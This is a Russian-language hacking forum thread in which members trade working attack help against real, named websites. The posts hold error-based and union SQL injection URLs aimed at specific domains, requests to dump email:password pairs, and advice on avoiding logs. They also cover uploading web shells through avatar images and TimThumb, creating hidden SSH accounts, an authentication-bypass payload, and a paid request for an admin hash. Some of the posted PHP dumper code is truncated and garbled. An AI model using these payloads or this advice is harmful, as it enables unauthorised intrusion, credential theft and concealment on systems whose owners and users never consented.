Melfis said:
в неправильном синтаксисе:
table_schema=(medray)
Вместо скобок тут должны быть кавычки (ну или кавычкни внутри скобок, в любом случае стринговый параметр надо обрамлять ими), а т.к. mq=on, то надо переводить в хекс имя бд medray (в нех формате кавычки не нужны)
table_schema=0x6d6564726179
или для примера
table_schema=(0x6d6564726179)


Благодарю, второй способ с скобками работает, а еще один вопрос назрел: каким сервисом пользоваться, чтобы перевести название слова в 0x.....

to mr_zedox

Есть хороший плагин для Firefox под названием HackBar

cat1vo said:
to
mr_zedox
Есть хороший плагин для Firefox под названием
HackBar


спасибо, но предпочитаю chrome браузер. А на счет вопроса, то уже нашел решение: http://chxo.com/scripts/hex2string.php

Ребят,неужели никто не знает sql-dumper'a,который поддерживает иньекции в хэдере...

Нужно сдампить мыло:пасс с error-based скули в хэдере "client-ip"...

мб,возможно какой-то скрипт набросать...

буду очень благодарен за любую помощь

HeaVeNSeR said:
Ребят,неужели никто не знает sql-dumper'a,который поддерживает иньекции в хэдере...
Нужно сдампить мыло:пасс с error-based скули в хэдере "client-ip"...
мб,возможно какой-то скрипт набросать...
буду очень благодарен за любую помощь


Так есть же. rSaUnDumper вроде называется.


mr_zedox said:
Благодарю, второй способ с скобками работает, а еще один вопрос назрел: каким сервисом пользоваться, чтобы перевести название слова в 0x.....


http://tools.0x0000ed.com/sqlhex.php

здравствуйте, есть sql инъекция, через которую вынул логин и пароль админа. Нашел администраторскую панель, а заходить туда боюсь, т.к. логи спалят. Какие есть способы пролезть в админку чтобы не попасть в логи, либо как их можно потом стереть?

у меня ОС linux fedora, по этому не знаю здесь местные тулзы для подключения к проксе, не подскажите?

mr_zedox said:
здравствуйте, есть sql инъекция, через которую вынул логин и пароль админа. Нашел администраторскую панель, а заходить туда боюсь, т.к. логи спалят. Какие есть способы пролезть в админку чтобы не попасть в логи, либо как их можно потом стереть?
у меня ОС linux fedora, по этому не знаю здесь местные тулзы для подключения к проксе, не подскажите?


фак, тебя что в гугле забанили?

http://mrthe.name/2010/01/widecap/

Мне нужно для ОС linux, а не для windows...

Ereee said:
Так есть же. rSaUnDumper вроде называется.


rSaUnDumper последней версии,к сожалению,тоже не справился...(

неужели ни у кого не завалялся такой скрипт,простой дамп по лимиту?)

HeaVeNSeR said:
rSaUnDumper последней версии,к сожалению,тоже не справился...(
неужели ни у кого не завалялся такой скрипт,простой дамп по лимиту?)


как то писал скрипт на пхп парсер по лимиту, и запускал на шеллах, щас потерялся, но как идея работает на верняка...

P.S:

Вот нашел у себя сырой скриптик, тебе его только под свою скулю сделать и все, конечно же возможны баги...


PHP:
Стартанул перебор лимита:
";

echo$filename."
";

while ($limit1++БД слита!";

?>

Не возможно пойти назад. http://site.ru/nastroyki.php?a=igry_java&id=../../../../../../../../etc/passwd Есть альтернатива обратному пути? То есть символу ../

winstrool,

ему надо, чтоб в хидерах.


PHP:


Так? Не?

спасибо Ereee,winstrool за предоставленные скрипты

вариант Ereee дампит пустые строчки,мб ошибка в... ?


Code:
preg_match("#|||(.*)|||#", $source, $data);



xcedz said:
чего бросать то
. Юзаем sqlmap


очень хотелось бы sqlmap'ом,удобная тулза...но как я ни старался,проверял при level=5 и risk=3,указывал параметр "client-ip",добавлял --headers="client-ip: *" - sqlmap не находил скулю...он проверяет куки,юзер-агент,реферер,хост,но не client-ip...погуглил,похоже что поддержки иньекций в других хэдерах ещё нет(

Пробелы удалил? Раскрученную скулью поставил?

Ereee said:
Пробелы удалил? Раскрученную скулью поставил?


да, limit $1,1 добавлял...пробывал .$1,1...в браузере проверял,всё норм...странно

Тьфу! Имя переменной $i, а не $1 =\

Исправил код Ereee, теперь все работает проверял на себе


PHP:

cat1vo said:
Исправил код
Ereee
, теперь все работает проверял на себе

PHP:




рабочий вариант,благодарю


Ereee said:
Тьфу! Имя переменной $i, а не $1 =\


я $i как раз и пробывал,всё равно чёт не дампил

в vbseo есть LFI, вида:


Code:
vbseo.php?vbseoembedd=1&vbseourl=

Загрузил на форуме аватар(внутри шелл), пытаюсь заинклюдить:


Code:
vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif

Показывает просто напросто саму картинку

Попробывал с нулл байтом:


Code:
vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif%00.php

Выдает ошибки:


Code:
Warning: require(38290.gif) [function.require]: failed to open stream: No such file or directory .../public_html/forum/vbseo.php on line 1544

Fatal error: require() [function.require]: Failed opening required '38290.gif' (include_path='.:/usr/local/lib/php') iny .../public_html/forum/vbseo.php on line 1544

Cherep said:
в vbseo есть LFI, вида:

Code:
vbseo.php?vbseoembedd=1&vbseourl=

Загрузил на форуме аватар(внутри шелл), пытаюсь заинклюдить:

Code:
vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif

Показывает просто напросто саму картинку
Попробывал с нулл байтом:

Code:
vbseo.php?vbseoembedd=1&vbseourl=avatars/users/38290.gif%00.php

Выдает ошибки:

Code:
Warning: require(38290.gif) [function.require]: failed to open stream: No such file or directory .../public_html/forum/vbseo.php on line 1544

Fatal error: require() [function.require]: Failed opening required '38290.gif' (include_path='.:/usr/local/lib/php') iny .../public_html/forum/vbseo.php on line 1544




Учите матчасть Уважаемый прежде чем задавать подобные вопросы.

Во первых: Необходимо убедиться что после залития аватарки PHP код внутри файла сохранился в целостности. Собственно ,скорее всего, картинка сконвертилась или рекодилась в результате чего код `побился` и естественно не выполняется при выполнении остальных условий инклуда.

Ребят, не знаю за что удалили мой пост, ведь я не просил никого ничего ломать - я попросил помочь мне, обьяснить почему не работают мои запросы, ведь я просто хочу разобраться. Впредь если мой пост удалят по несоответствию с правилами - напишите мне хотя бы в личку ответ. Спасибо заранее. На страничке http://footquest.poltava.ua/players в строке поиска скуль иньекция. Я пытался делать различные запросы но скорее всего передающиеся данные в запросе в скобочках. Как это обойти подскажите плс.

LelouchMe said:
Ребят, не знаю за что удалили мой пост, ведь я не просил никого ничего ломать - я попросил помочь мне, обьяснить почему не работают мои запросы, ведь я просто хочу разобраться. Впредь если мой пост удалят по несоответствию с правилами - напишите мне хотя бы в личку ответ. Спасибо заранее. На страничке http://footquest.poltava.ua/players в строке поиска скуль иньекция. Я пытался делать различные запросы но скорее всего передающиеся данные в запросе в скобочках. Как это обойти подскажите плс.


постом отправляй

s_user_nick='and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--

Как и что тут менять - кури маны.

Melfis said:
постом отправляй
s_user_nick='and(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Как и что тут менять - кури маны.


Duplicate entry '5.0.91-community1' for key 1

бегаю по гуглу...

Cennarios said:
Учите матчасть Уважаемый прежде чем задавать подобные вопросы.
Во первых: Необходимо убедиться что после залития аватарки PHP код внутри файла сохранился в целостности. Собственно ,скорее всего, картинка сконвертилась или рекодилась в результате чего код `побился` и естественно не выполняется при выполнении остальных условий инклуда.


вы оказались правы. Код не сохранился, но потом перезалил картинку в другое место на форуме(проверил-код сохранился, все хорошо), но теперь пишу точно так же


Code:
vbseourl=users/38290-albums1533-1313.png

и с нулл байтом пробывал


Code:
vbseourl=users/38290-albums1533-1313.png%00.php

в итоге отображается пустая страничка. Что делать?

Cherep said:
проверил-код сохранился, все хорошо


Как образом проверили?


Cherep said:
в итоге отображается пустая страничка. Что делать?


Может все таки не сохранился? И если там мини шелл вида


Code:


, то может стоит все таки передавать еще доп. параметры в инклуд?

cat1vo said:
Как образом проверили?
Может все таки не сохранился? И если там мини шелл вида

Code:


, то может стоит все таки передавать еще доп. параметры в инклуд?


там полноценный шелл. Проверил так: залил картинку, сохранил у себя, открыл блокнотом(код был полностью целым)

Cherep said:
там полноценный шелл. Проверил так: залил картинку, сохранил у себя, открыл блокнотом(код был полностью целым)



Начнем с того, что частенько такие функции как eval, system etc отключаются в PHP. Ищем phpinfo() - выясняем. Или еще проще - вместо eval в картинке заливаем сам phpinfo() и смотрим

я обещаю что буду искать, прежде чем задавать вопросы
(https://antichat.live/threads/43966/)

Самое интересное что эту статью читал!!! К моему примеру я ответа не нашел, так как запросы выполняются через information_schema а там разрешается ТОЛЬКО чтение. Мне же интересно можно ли как-то провести запрос на изменение данных...

Konqi: тогда читайте учебник по php+mysql, все станет ясно, данный вопрос задавали многократно

народ, как можно вывести даннные если фильтруется limit

where id=

А вообще как-то странно фильтруется, хотя чёрт его знает что там за задумка была...

Вопрос: если в GET запросе в поле login=user ввести ' то фильтрация меняет кавычку на \' то есть на странице идёт вывод Логин: user\' это как-то можно обойти...? Заранее спс...

LelouchMe said:
Вопрос: если в GET запросе в поле login=user ввести ' то фильтрация меняет кавычку на \' то есть на странице идёт вывод Логин: user\' это как-то можно обойти...? Заранее спс...


Нет.

Существует ли способ залить шелл через InstantCMS v1.9.1 ?

и какие есть еще способы залить шелл через phpbb 3.0.10.

редактировать стили не получается


Code:
Incorrect string value: '\xC1\xF0\xFF\xED\xF1\xEA...' for column 'template_data' at row 1 [1366]...

через восстановление бд тоже не катит (((

Sleep said:
Существует ли способ залить шелл через InstantCMS v1.9.1 ?


А через "Баннеры" пробовали? Это вроде единственный способ в ней, вроде!

Joomla 1.5

index.php?option=com_weblinks&view=category&id=29&filter_order=%00'

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/site/www.site.com/libraries/joomla/database/database/mysql.php on line 344 Community Links

Warning: Invalid argument supplied for foreach() in /home/site_webmaster/www.site.com/components/com_weblinks/views/category/tmpl/default_items.php on line 38

$20 za pomosh v polycheniyy hasha admina esli vozmojno

promarketing said:
Joomla 1.5
index.php?option=
com_weblinks
&view=category&id=29&filter_order=%00'


Ну поиск то для кого ?


################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_weblinks
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id=-1 UNION SELECT 1,2,3,4,5
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
################################################## #################


Взято отсюда (https://antichat.live/showpost.php/p/2035820/postcount/178/)

Exploit #1 (http://www.exploitsdownload.com/exploit/na/mambo_46rc1_sqltxt)

Exploit #2 (http://exploitsdownload.com/exploit/php/mambo-46rc1-weblinks-blind-sql-injection-exploit)

BigBear said:
Ну поиск то для кого ?
Взято
отсюда (https://antichat.live/showpost.php/p/2035820/postcount/178/)
Exploit #1 (http://www.exploitsdownload.com/exploit/na/mambo_46rc1_sqltxt)
Exploit #2 (http://exploitsdownload.com/exploit/php/mambo-46rc1-weblinks-blind-sql-injection-exploit)


tam sql inj ne v "id" a v "filter_order="

http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.5_21%5D_sql_injection

Есть форум на vbulletin 3.8.4, есть эксплоит:


[path]/includes/functions.php?$classfile=[shell].txt?


Шо за "path" и как здесь залить шел? ПРописать полный путь до шела на моем хосте? Вот так:


[path]/includes/functions.php?$classfile=http://www.site.ru/shell.txt?


А дальше, как в php его запустить?

http://www.mindsoul.ru/index.php?id=628

хелп, чёт ничего не выводит

qaz said:
http://www.mindsoul.ru/index.php?id=628
хелп, чёт ничего не выводит


http://www.mindsoul.ru/index.php?id=-628)+union+select+version()+--+

ток обрезает, надо через базед крутить..

qaz said:
http://www.mindsoul.ru/index.php?id=628
хелп, чёт ничего не выводит


http://www.mindsoul.ru/index.php?id=-628)union select(concat_ws(0x3a,'',user()))+--+

http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=kpm&dir=asc

help

qaz said:
http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=kpm&dir=asc
help




Code:
http://www.ukcs.net/statsd/stats.php?q=players&page=6&sort=rand(if(ascii(substr(version(),1,1))=53,1,0))&dir=asc

5+

вопрос по microsoft acces:

нашел полЯ с выводом

теперь если можно примером:

1.как узнать юзера,базу и т.д.

2.как повысить привелегии на

чтение системных таблиц и для иСПОЛЬЗОВАНИЯ

стандартного шелла

спецы помогите!

lucky_dom said:
вопрос по microsoft acces:
нашел полЯ с выводом
теперь если можно примером:
1.как узнать юзера,базу и т.д.
2.как повысить привелегии на
чтение системных таблиц и для иСПОЛЬЗОВАНИЯ
стандартного шелла
спецы помогите!


Ты в слове "иСПОЛЬЗОВАНИЯ" кнопкой shift неправильно воспользовался.

1) Для того, что бы проверить, надо что-нибудь вывести, для этого используем подзапрос, и так что же мы можем вывести:

1 or 1=@@version-- - Версия

1 or 1=(select db_name())-- - Имя Базы Данных текущего юзера.

1 or 1=(select system_user)-- - Имя юзера владельца данной базой.

/thread30501.html

2)Не понятно

По пункту 2 читал оф. Документацию

office.microsoft.com/ru-ru/access-help/CH010072899.aspx

не понятно как все это дело вставлять в инъекцию

ASP.NET Padding Oracle Vulnerability

Здравствуйте, хотелось бы узнать, каким же образом можно использовать данную уязвимость? В общем по переходе на ссылку:


site.ru/WebResource.axd?d=zt87v2JeCPKYzqUfGEffpA2


выводится сообщение:


Padding is invalid and cannot be removed.


Все ссылки на самом сайте имеют расширение wbp:


site.ru/link/index.wbp


Мои познания очень неглубоки, так что буду очень благодарен если кто нибудь сможет мне разжевать данную информацию.

Заранее всем большое спасибо...

to br00train

ASP.NET Padding Oracle Exploit Tool Demo (http://www.onpreinit.com/2010/09/padding-oracle-exploit-tool-demo.html)

Народ, где взять дорки для Гугла?

to Try

Google Hack Dorks Database (http://www.exploit-db.com/google-dorks/)

Возможно ли с помощью XSS получить куки с другого под домена?

(need.site.com)

В данной ситуации :


.site.com PHPSID=*****************
xss.site.com PHPSID=2****************
need.site.com PHPSID=3****************; login=123; pass=123

Здравствуйте, возможно ли обойти фильтр XSS если никакие символы не фильтруются, кроме как если за "

Как создать учетную запись в ssh срочно !

Groove said:
Как создать учетную запись в ssh срочно !


sudo useradd noob

sudo passwd noob

***** (тут пасс)

Konqi said:
sudo useradd noob
sudo passwd noob
***** (тут пасс)


куда это прописывать ?

Groove said:
куда это прописывать ?


что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом

если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл

/etc/ssh/sshd_config

PermitRootLogin no -> PermitRootLogin yes

Konqi said:
что значит куда? у тя же терминал открытый через ssh, вводи эти команды под рутом
если ты имеешь ввиду создание пользователя у которого будет доступ к ssh, то по дефолту у всех пользователей кроме рута есть доступ к ssh, чтобы работать под рутом поправь файл
/etc/ssh/sshd_config
PermitRootLogin
no
-> PermitRootLogin
yes


А как спрятать учетку ?

Groove said:
А как спрятать учетку ?


спрятать от кого или от чего?

в /etc/passwd все равно палится учетка


Code:
cat /etc/passwd | awk -F: '{print $1}'

Word press TimThumb Уязвимость

/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable

Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл

Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть

а ты пробовал blabla.php%00.jpg , или через temper data?

или так же заместо http://yousite.com/shell.php

так https://yousite.com/shell.php,ftp://yousite.com/shell.php?

.htaccess решает проблему если повезет с правами.

promarketing said:
Word press TimThumb Уязвимость
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable
Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл
Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть


Ахах, бро. А ты уверен, что шелл на твоем сервере не выполняется, а выдает соурс?

promarketing said:
Word press TimThumb Уязвимость
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.php (или shell.php4 shell.php%00) даёт error 503 Service temporary unavailable
Всё остальное успешно инклудится и появляется в cache папке - shell.php%20 shell.gif но не работает как php файл
Есть решение? вроде возможно т.к пару чужих .php файлов в папке cache уже есть


Тебе нужен не выполненный php скрипт, а сорцы т.е. ты когда заходишь на http://site.com/index.php , где index.php содержит :


PHP:


ты видишь слово "привет", т.е. результат скрипта, а не сорцы => попробуй :


PHP:
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.txt

Или нужно, чтоб у тебя в настройках http://blogger.com.site.com/ не исполнялиь php-скрипты (другой хостинг, типа narod.ru)

Другими словами если ты зайдешь на http://site.narod.ru/index.php , с тем же содержанием ты увидишь не исполненный скрипт, а собственно сорцы:


PHP:

Друг, ниочем написал. Где ты видел такое:


PHP:


???

Надо в кавычки брать =))

Ereee said:
Друг, ниочем написал. Где ты видел такое:

PHP:


???
Надо в кавычки брать =))


одно слово и без кавычек работает...

а ниочем это для тебя, т.к. ты это знаешь, а для того кто не знает нужно описывать подробно, чтоб понятно было с примерами... хотя может и дурацкими

Sidarovich1975 said:
Тебе нужен не выполненный php скрипт, а сорцы т.е. ты когда заходишь на http://site.com/index.php , где index.php содержит :

PHP:


ты видишь слово "привет", т.е. результат скрипта, а не сорцы => попробуй :

PHP:
/wp-content/themes/theme/scripts/timthumb.php?src=http://blogger.com.site.com/shell.txt

Или нужно, чтоб у тебя в настройках http://blogger.com.site.com/ не исполнялиь php-скрипты (другой хостинг, типа narod.ru)
Другими словами если ты зайдешь на http://site.narod.ru/index.php , с тем же содержанием ты увидишь не исполненный скрипт, а собственно сорцы:

PHP:




Если уж ты даёшь советы, да ещё даёшь советы тем кто даёт советы о том как правильно давать советы, посмотри на вопрос : "Word press TimThumb"

Если ты понятия не имеешь о чём речь, зачем твои советы по поводу народа и .txt расширения, да ещё рассуждения о том как нужно советовать?

/index.php?artid=30 and 1=2 - ошибко

/index.php?artid=30 and 1=1 - норм

/index.php?artid=30 select - нормал

/index.php?artid=30 UniON - страничка пугалка а.к.а "за вамы уже выехали"

остается тока крутить как блинд? отчета об ошибки нету

залил все таки шелл на поддомен, все ок, но возникла проблема. сайт на другом ипе, основной. можно ли через поддомен пробраться к сайту?

Есть сайт на Drupal.Раньше спокойно приходили куки, но после его обновления перестало приходить id сессии вида "SESSd9cc53338c9b7991787e099f00cbe150"-к примеру.

Знаю что дело не в сниффере ибо при вводе javascript:alert(document.cookie) id тоже нет

Зато сессию можно просмотреть в куках браузера

И как же мне получить эту сессию на сниффер??Сорри на нубство

Metho said:
залил все таки шелл на поддомен, все ок, но возникла проблема. сайт на другом ипе, основной. можно ли через поддомен пробраться к сайту?


Возможно что основной сайт написан на том что и сайт на поддомене, если залил шелл попробуй поискать баги в коде и применить их на основном домине, у меня бывали такие случии что прокатывало...

Подскажите, пожалуйста, нубу.. Каким образом дампится блинд sql скуль? знаю количество столбцов, имя бд, таблицы и столбцов.. Попробовал несколько паблик прог - не катит..

to briz

rsaUnDumper, sqlmap, toolza

Да много еще, Вы, молодой человек, плохо искали!

Столкнулся с проблемой:

1) Есть 2 сервера, которые как-то слинкованы между собой - т.е. с одного можно читать файлы другого и наоборот.

2) Найдена функция позволяющая читать содержимое файла и вот хз, что это. Скорее всего релинковка через htaccess

3) Добрался до конфигов, кроме httpd, логи же вообще читать не позволяет, хотя установил место-положение.

4) Пути до 2 сервера не могу найти ну вообще никак - логический перебор названий ни к чему не привел, при этом раскрытия путей точно нет. Читать из веба файлы он отказывается, что делать?

5) Файлы судя по всему хранятся не по тому адресу, что показываются - как результат напрямую запросить залитый шелл не могу, и логический перебор опять же не помог.

Что можно сделать? Куда копать? Имеет ли смысл вообще раскручивать этот способ или браться за поиск других ошибок?

PS /proc/sys/ и етк спокойно читаются.

PS это дебиан -_-

briz said:
Подскажите, пожалуйста, нубу.. Каким образом дампится блинд sql скуль? знаю количество столбцов, имя бд, таблицы и столбцов.. Попробовал несколько паблик прог - не катит..


посимвольно,через вывод ошибок...

http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+


Нормальный вывод


http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+


Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'


Как боротся?

Собственно интересно как можно оказаться воздействие на переменные окружения при:

APACHE_PID_FILE=/var/run/apache2.pid

APACHE_RUN_USER=www-data

PATH=/usr/local/bin:/usr/bin:/bin

PWD=/

APACHE_RUN_GROUP=www-data

LANG=C

SHLVL=1

_=/usr/sbin/apache2

Pirotexnik

aes_decrypt(aes_encrypt(user()))

RuDefc0n

там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ

Pirotexnik said:
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+
Как боротся?



http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,unhex(hex(user()))+--+

Konqi said:
Pirotexnik
aes_decrypt(aes_encrypt(user()))
RuDefc0n
там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ


По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог.

Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.

RuDefc0n said:
По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог.
Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.


по информации из environ видно что там наверняка дебиан бейсд дистро какой то (debian/ubuntu), пробовал читать /etc/apache2/conf/apache2.conf ? там спалишь пути к htdocs, а дальше читаем скрипты..

Что-то я не врубился О_0

-1110+union+select+1,2,3,4,aes_decrypt(aes_encrypt( user()))+--+


You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ')) -- order by rus' at line 1


-1110+union+select+1,2,3,4,unhex(hex(user()))+--+


You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '(hex(user())) -- order by rus' at line 1


Что за?

Pirotexnik

во первых, что за фигня конструкция "+--+" ?

во вторых запости ссылку

Konqi said:
Pirotexnik
во первых, что за фигня конструкция "+--+" ?


коментирование)

winstrool said:
коментирование)


okay (http://dev.mysql.com/doc/refman/5.1/en/comments.html)

Konqi said:
okay (http://dev.mysql.com/doc/refman/5.1/en/comments.html)


Однострочный коммент в мускуде - "-- ". Пробел после минусов обязателен. В адресной строке символ "+" эквивалентен пробелу.

можно писать и так:

...%20limit%201,1--%20

но это "немного" снижает читабельность.

поэтому %20 заменяют плюсом.

но ...+limit+1,1--+ выглядит не красиво, поэтому я ставлю 2 "+" что бы запрос был симетричен.

^^

Проблемма решилась с помощью cast(user())+as+binary)

Спасибо нахтачку.

Pirotexnik said:
Однострочный коммент в мускуде - "-- ". Пробел после минусов обязателен. В адресной строке символ "+" эквивалентен пробелу.
можно писать и так:
...%20limit%201,1--%20
но это "немного" снижает читабельность.
поэтому %20 заменяют плюсом.
но ...+limit+1,1--+ выглядит не красиво, поэтому я ставлю 2 "+" что бы запрос был симетричен.
^^
Проблемма решилась с помощью cast(user())+as+binary)
Спасибо
нахтачку
.


Ну вообще, если вникать в док мускуля, то комментарий должен обрамляться пробелом с обеих сторон, поэтому тут не со стороны симметрии, а со стороны правильности запроса.Кто-то в своей статье на это ссылался, кстати.

Konqi said:
по информации из environ видно что там наверняка дебиан бейсд дистро какой то (debian/ubuntu), пробовал читать /etc/apache2/conf/apache2.conf ? там спалишь пути к htdocs, а дальше читаем скрипты..


Дебиан там проживает.

Читал я уже этот конфиг...

httpd.conf не дает вообще почитать.

/var/www, а вот дальше только брутить название папок.

Только вот чем?

Такс... немного логически подумав нашел

2 с конца папки и 2 с начала. Никак не могу понять, что может быть по-середине:

/var/www/тутчто-то/imghost/project/

/showthread.php?t=220796

КOT said:
/showthread.php?t=220796


А зачем мне директории основного сайта?

Мне надо путем lfi получить путь до корневой папки, что по описанию указанная программа не может сделать

RuDefc0n said:
Читал я уже этот конфиг...
httpd.conf не дает вообще почитать.


там нету httpd.conf, в дебиан бейсд системах вместо httpd везде apache2, и сервис, и папки и конфиги

пробовал искать вывод ошибок на соседних сайтах?

Konqi said:
там нету httpd.conf, в дебиан бейсд системах вместо httpd везде apache2, и сервис, и папки и конфиги
пробовал искать вывод ошибок на соседних сайтах?


Да, без шансов. Везде отрублены.

Помогите развести:

http://bronevhod.info/index.php?o=19+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14+--+

shadowrun said:
Помогите развести:
http://bronevhod.info/index.php?o=19+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13,14+--+


Количество колонок не 14, а 27


http://bronevhod.info/index.php?o=19+order+by+27

VY_CMa said:
Количество колонок не 14 а 27


Я тоже 27 подобрал,а дальше не понял

Товарищи мегОхрякеры!

Вобщем трабла, я не особо знаком с запросами mysql. Через wso 2.4 подключаюсь к бд, таблички все открываются как обычно нормально. Но вот меня больше интересует табличка client, при попытке открыть получаю ошибку вида:

Error: SELECT command denied to user 'bd_site'@'domain.com' for table 'client'

Вы воскликните:"Да тут и дураку понятно что запрещен SELECT для таблицы client".

Внимание вопрос!

тут пауза в 1 минуту, чтобы вы сосредоточились на мне...

Как слить табличку client? Спасибо!

1) залиться

2) найти юзвера с норм правами

3) юзать 1day (https://rdot.org/forum/showthread.php?t=2218) сплойт под mysql если повезет с зависимостями.

shell_c0de

1) я давно залился

2) нет юзера с норм правами

3) не работает биндпорт и бкконект.

Придется обидеться и расплакаться...

привет всем, подскажет кто по заливке шелла в "Webasyst", способ с картинкой логотипа для печатной формы не катит (нет такого пункта в админке->настройки), файл сертификата для дополнителной системы оплаты льётся, но доступа к директории нету, через редактирование шаблона тоже не получается (похоже отключен php в настройках). Есть какието ещё варианты ? спасибо заранее.

mega_667 said:
привет всем, подскажет кто по заливке шелла в "Webasyst", способ с картинкой логотипа для печатной формы не катит (нет такого пункта в админке->настройки), файл сертификата для дополнителной системы оплаты льётся, но доступа к директории нету, через редактирование шаблона тоже не получается (похоже отключен php в настройках). Есть какието ещё варианты ? спасибо заранее.


скорей всего без вариантов....

en.ayinger-bier.de/?pid=263+group+by+1+--+

Наставьте на правильный путь...

shadowrun said:
en.ayinger-bier.de/?pid=263+group+by+1+--+
Наставьте на правильный путь...


blind

kingbeef said:
blind


так не люблю

Ребят подскажите пожалуйста где находятся конфиги доступа бд в vbulletin 3.3

UPD: нашел ) Includes/config.php

Есть инъекция с читалкой файлов, нашел там раскрытие путей, но не могу прочитать этот файл, хотя он точно существует, зато могу прочитать /etc/passwd, апачевский конфиг. В конфиге нашел


PHP:
# DocumentRoot: The directory out of which you will serve your

# documents. By default, all requests are t aken from this directory, but

# symbolic links and aliases may be used t o point to other locations.

#

DocumentRoot"/var/www/html"

...

# This should be changed to whatever you s et DocumentRoot to.

#





Описаний виртуальных хостов я там не нашел. В раскритии путь выглядит иначе


PHP:
/home/site/public_html/music/p.php

Где правду искать ?

Есть инъекция даже не 1 немогу шелл залить помогите плиз

http://wow.igrosfera.net/acp/index.php?modul=static&id=3

Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем


Code:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%28 0x3a,version%28%29,user%28%29,database%28%29%29%29 ,0x3a,floor%28rand%280%29*2%29%29having+min%280%29 +or+1--+

там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ?

CyberKillerz said:
Есть инъекция даже не 1 немогу шелл залить помогите плиз
http://wow.igrosfera.net/acp/index.php?modul=static&id=3




Code:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+and+extractvalue(1,(select+concat(0x2a,(selec t+table_name+from+information_schema.tables+where+ table_schema!='information_schema'+limit+0,1))))

trololoman96 said:
Ну ты и наркоман, сам то читал что написал ?) Скуля твоя крутится как еррор басед без проблем

Code:
http://wow.igrosfera.net/acp/index.php?modul=static&id=3+or+1+group+by+concat%28%28select+concat_ws%28 0x3a,version%28%29,user%28%29,database%28%29%29%29 ,0x3a,floor%28rand%280%29*2%29%29having+min%280%29 +or+1--+

там есть доступ к куче бд, походу ко всем что крутится на этом сервере, на одном из поддоменов крутится вордпресс бложек, понел к чему я веду ?


Хм ты намекаешь на его уязвимость ? я просто начинающий )

CyberKillerz said:
Хм ты намекаешь на его уязвимость ? я просто начинающий )


он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...

smirk said:
он намекает, чтоб ты вытащил логин и хеш админа вордпресса и через этот блог залил шелл...


а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))

CyberKillerz said:
а ни кто не поможет с брутом а то у мну с ним постоянная проблема ))


брут чего? хеша? есть раздел выше про расшифровку хеша, запости туда свой хеш и надейся ,что его расшифруют

Что обычно находится в папках includes?

В связи с чем задаю вопрос -

Есть раскрученный блинд, есть фулл доступ к поддомену. Но надо сам домен. В инклайдс шелл. В админку мейна не заходит из данных бд, только в кабинет на отдельном сайте поддомене.

как монжно обойти авторизацию ?

[QUOTE="CyberKillerz"]
CyberKillerz said:
как монжно обойти авторизацию ?

VY_CMa said:
В качестве имени отправить инъекцию.
Что-то вроде '+OR+1=1+--+


